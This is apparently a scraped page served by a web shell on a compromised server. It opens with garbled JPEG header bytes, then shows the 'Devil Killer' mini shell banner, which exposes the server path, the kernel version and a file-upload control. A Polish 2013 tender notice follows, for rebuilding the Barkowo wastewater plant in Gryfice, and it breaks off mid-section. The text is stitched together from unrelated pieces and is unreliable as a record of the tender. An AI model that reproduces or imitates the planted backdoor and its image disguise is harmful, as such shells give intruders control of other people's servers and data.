JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131016/215867-N-2013.html

<p class="kh_header"><b>Gryfice: Robota budowlana polegająca na przebudowie oczyszczalni ścieków z przyłączem wodociągowym, zewnętrzną instalacją zasilania energetycznego, sterowania i sygnalizacji                      oraz oświetlenia zewnętrznego, z drogami wewnętrznymi i placami manewrowymi, rurociągiem odprowadzającym ścieki oczyszczone  do rowu z wylotem, technologią oczyszczalni ścieków                 wraz z rozbiórką części obiektów istniejącej oczyszczalni ścieków w m. Barkowo gm. Gryfice,              na działkach o numerach geodezyjnych 10, 11/10 i 11/11 w obrębie Barkowo</b><br>
<b>Numer ogłoszenia: 215867 - 2013; data zamieszczenia: 16.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842047, faks 091 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.zgk.gryfice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Robota budowlana polegająca na przebudowie oczyszczalni ścieków z przyłączem wodociągowym, zewnętrzną instalacją zasilania energetycznego, sterowania i sygnalizacji                      oraz oświetlenia zewnętrznego, z drogami wewnętrznymi i placami manewrowymi, rurociągiem odprowadzającym ścieki oczyszczone  do rowu z wylotem, technologią oczyszczalni ścieków                 wraz z rozbiórką części obiektów istniejącej oczyszczalni ścieków w m. Barkowo gm. Gryfice,              na działkach o numerach geodezyjnych 10, 11/10 i 11/11 w obrębie Barkowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonawca w celu realizacji przedmiotu zamówienia zobowiązany jest do wykonania następujących elementów składających się na przebudowę oczyszczalni:
a) przyłącza wodociągowego z rur PE100 SDR 11 o średnicy zewnętrznej 90 mm i łącznej 
    długości ok. 305 mb;
b) rozbiórek:
     - budynku technicznego o kubaturze 382,5 m3, z dachem dwuspadowym                        
        o pokryciu z płyt azbestowo-cementowych;
     - istniejących betonowych studni kanalizacyjnych O 1000 mm, O 1200 mm,                    
        O 1400 mm;
     - komory zagęszczania osadu O 2200 mm;
     - poletka osadowego o powierzchni zabudowy 65 m2;
     - komory kraty koszowej w postaci studni betonowej O 1200 mm;
     - ogrodzenia z siatki stalowej na słupkach betonowych ok. 142 mb wraz z demontażem 
        bramy wjazdowej;    
c) remontu osadnika Imhoffa - czyszczenia i dezynfekcji, wykonania nowych powłok 
    ochronnych, nowych barierek zabezpieczających, wykonania nowego pomostu                       
    oraz zmiany nachylenia ścian części osadowej osadnika;
d) budowy (montażu):
        - sita bębnowego;
        - złoża biologicznego ze zintegrowanym osadnikiem wtórnym;
        - studzienki pomiarowej O 1000 mm;
        - studzienki wodomierzowej O 1200 mm;
        - zbiornika magazynowania osadu nadmiernego;
        - przyłącza energetycznego;
        - rurociągów międzyobiektowych wraz ze studniami;
        - linii kablowych energetycznych, sygnalizacyjnych, sterowniczych,
        - oświetlenia terenu oczyszczalni,
        - szafy elektrycznej i sterowniczej, 
        - nowego ogrodzenia o łącznej długości ok. 142 mb;
        - dróg i placów manewrowych o łącznej powierzchni ok. 520 m2. 
Ww. roboty muszą być wykonane w zakresie umożliwiającym uzyskanie pozwolenia                                 na użytkowanie zgodnie z obowiązującymi przepisami, normami, a w szczególności z przepisami Prawa budowlanego oraz na ustalonych umową warunkach.

Szczegółowo opis zamówienia określają: dokumentacja projektowa,  specyfikacja techniczna wykonania i odbioru robót budowlanych, przedmiar robót oraz wzór umowy. 
Dokumentacja ta jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego http://bip.zgk.gryfice.eu/zamowienia/pokaz/43.dhtml. W przypadku,                             gdyby Wykonawca nie posiadał dostępu  do internetu, musi to zgłosić Zamawiającemu.                             W takiej sytuacji dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych i przedmiar robót będą udostępniane Wykonawcom w celu sporządzenia oferty                w wersji elektronicznej na płycie CD za odpłatnością ceny nośnika i przesyłki pocztowej.
Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - Zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez Wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod pojęciem minimalne parametry jakościowe i cechy użytkowe Zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów / produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. 
W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygadniających               te materiały lub urządzenia. Zamawiający zastrzega sobie prawo wystąpienia do autora dokumentacji projektowej o opinię na temat oferowanych materiałów lub urządzeń. Opinia ta może stanowić podstawę do podjęcia przez zamawiającego decyzji o przyjęciu materiałów lub urządzeń równoważnych albo odrzuceniu oferty z powodu braku równoważności.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9, 45.00.00.00-7, 45.26.26.60-5, 45.11.00.00-1, 45.33.00.00-9, 45.31.10.00-0, 45.31.20.00-7, 45.31.61.00-6, 45.23.32.26-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga zabezpieczenia oferty wadium:

a)	Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść 
        wadium w wysokości 12.000,00 zł (słownie: dwanaście tysięcy złotych 00/100).
b)	Wadium może być wniesione w:
- pieniądzu;
-  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42 poz. 275 z późn. zm.).
c)	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku 
        Spółdzielczym O/Gryfice nr rachunku 30 9376 0001 0000 0433 2001 0013,                         
        z dopiskiem	na przelewie: Wadium w przetargu na przebudowę oczyszczalni                           
        w Barkowie.
d)	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
- pieniężnej - dokument potwierdzający wniesienie wadium został załączony                   
  do oferty,
- innej niż pieniądz - oryginał dokumentu został złożony w oddzielnej kopercie,                   
  a jego kopia w ofercie.
e)	Z  treści  gwarancji/poręczenia  winno  wynikać  bezwarunkowe,  na  każde  pisemne
żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy Pzp.
f)	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną 
        formą wadium, zostanie wykluczony z postępowania, a jego oferta zostanie  uznana 
        za odrzuconą.
g)	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia
na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy udokumentuje wykonanie, tj. zakończenie,                  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy -  w tym okresie, co  najmniej jednej roboty budowlanej polegającej  na budowie lub przebudowie oczyszczalni ścieków o projektowanej przepustowości nie mniejszej                        niż Q dśr = 40 m3 / dobę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że dysponuje w szczególności osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w  budownictwie                                         w  rozumieniu ustawy z  dnia  7  lipca  1994  r. Prawo  budowlane (Dz. U. 2003, Nr 207, poz. 2016 z późn. zm.), oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach   
samorządu zawodowego, w zakresie:
-    pełnienia funkcji kierownika budowy w specjalności konstrukcyjno-budowlanej;  
-     pełnienia funkcji kierownika robót sanitarnych w specjalności instalacyjnej                        
            w zakresie sieci i instalacji wodociągowych i kanalizacyjnych;
-    pełnienia funkcji kierownika robót elektrycznych w specjalności instalacyjnej                      
            w zakresie sieci, instalacji i urządzeń elektrycznych.
UWAGA! 
Kierownik budowy i kierownicy robót powinni posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2010 r. Nr 243,  poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa                    z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. Nr 63, poz. 394                      z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenie z urzędu skarbowego                  oraz z zakładu ubezpieczeń społecznych zarówno na spółkę, jak i na każdego ze wspólników.
Wymagania dotyczące dokumentów określonych w rozdziale 6 ust. 1 - 10 specyfikacji:
1. Dokumenty, o których mowa w rozdziale 6 ust. 1, 5, 6, 8, 9 i 10 specyfikacji winny być złożone                            
    w oryginale. Dokumenty, o których mowa w rozdziale 6 ust. 2-4 i 7 specyfikacji, winny zostać 
    złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem                                
    przez Wykonawcę.                     
2. Jeżeli Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium Rzeczypospolitej 
    Polskiej, zamiast dokumentów, o których mowa w rozdziale 6 ust. 2, 3, 4 specyfikacji składa 
    dokument lub dokumenty  wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
    potwierdzające odpowiednio, że:
      a) 	nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej            
           niż 6 miesięcy przed upływem terminu składania ofert),
      b)	  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne                           
            i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
          rozłożenie na raty zaległych płatności lub wstrzymanie w  całości wykonania decyzji 
        właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu  
               składania ofert).

    Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę                
    lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w lit. a) i b),                 
    zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby 
    uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, 
    administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju 
    miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
    zamieszkania, lub przed notariuszem. Dokumenty te powinny być wystawione odpowiednio               
    do terminów podanych w lit. a) i b). 
3. W przypadku składania jednej oferty wspólnej przez dwu lub kilku przedsiębiorców                        
    (tzw. konsorcjum) lub przez spółkę cywilną każdy za wspólników konsorcjum lub spółki 
    cywilnej musi złożyć dokumenty wymienione w rozdziale 6 ust.1-5 specyfikacji 
    (lub w rozdziale 6 ust. 12 lit. a) i b) specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce 
    zamieszkania poza terytorium Rzeczypospolitej Polskiej - wraz z dokumentami wymienionymi     
    w rozdziale 6 ust. 1 i 5 SIWZ).
      
    Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika 
    do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania                   
    w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, 
    podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. 
    Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie 
    zamówienia, określoną w art. 366 Kodeksu cywilnego.
  Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem 
  występującym jako reprezentant pozostałych.
4. Jeżeli Wykonawca, wykazując spełnianie warunków dotyczących wiedzy i doświadczenia                 
    oraz  osób  zdolnych  do  wykonania  zamówienia polega na zasobach innych podmiotów                    
   na  zasadach określonych w  art.  26  ust.  2b  ustawy Pzp zobowiązany  jest  oprócz  oświadczeń             
    i dokumentów  wymienionych  w  rozdziale 6 ust.  6-9 specyfikacji dodatkowo  udowodnić  
     Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,                  
   w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania 
   mu do dyspozycji niezbędnych   zasobów na okres   korzystania   z   nich   przy  wykonaniu 
    zamówienia. Dokumenty te są sporządzane w formie oryginałów lub kopii poświadczonych                   
    za zgodność z oryginałem przez te podmioty.
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia                                 
    oraz w  przypadku, gdy Wykonawca wykazując spełnianie warunków, o których mowa                    
    w rozdziale 5 ust. 2 pkt 1) i 2) SIWZ polega na zasobach innych podmiotów, kopie dokumentów 
    potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum 
    lub innych podmiotów są poświadczane za zgodność z oryginałem odpowiednio                              
    przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących)                        
    lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie,                           
    a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów 
    (każdy w odniesieniu do dotyczących go dokumentów). 
6. Inne dokumenty wymagane przez Zamawiającego:
- wypełniony formularz ofertowy, z wykorzystaniem wzoru - załącznik nr 1 do SIWZ;
- wypełniony formularz podwykonawcy, z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
- dowód wpłaty wadium.
7. W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów 
    przez osobę nie wymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy 
    do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo musi być złożone w oryginale          
    lub kopii poświadczonej przez notariusza.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
